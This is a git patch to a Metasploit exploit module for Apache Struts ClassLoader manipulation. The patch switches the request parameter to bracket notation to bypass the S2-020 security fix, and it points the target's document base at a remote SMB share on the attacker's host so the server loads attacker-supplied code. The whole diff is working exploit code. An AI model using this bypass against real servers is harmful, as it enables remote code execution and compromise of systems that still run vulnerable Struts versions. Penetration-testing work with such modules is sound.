From 3be2bde5a28b828eec997fb3c347d7d87ecec5be Mon Sep 17 00:00:00 2001
From: Julian Vilas <julian.vilas@gmail.com>
Date: Sat, 7 Mar 2015 19:14:20 +0100
Subject: [PATCH] Use bypass for bulletin S2-020

---
 modules/exploits/multi/http/struts_code_exec_classloader.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb
index 0cc50bebb5..17c1bb2126 100644
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
               'Platform' => 'win'
             }
           ],
-          ['Windows / Tomcat 6 & 7 (Remote SMB Resource)',
+          ['Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource)',
             {
               'Arch'     => ARCH_JAVA,
               'Platform' => 'win'
@@ -235,7 +235,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'version' => '1.1',
       'method'  => 'GET',
       'vars_get' => {
-        'class.classLoader.resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
+        'class[\'classLoader\'].resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
       }
     })
   end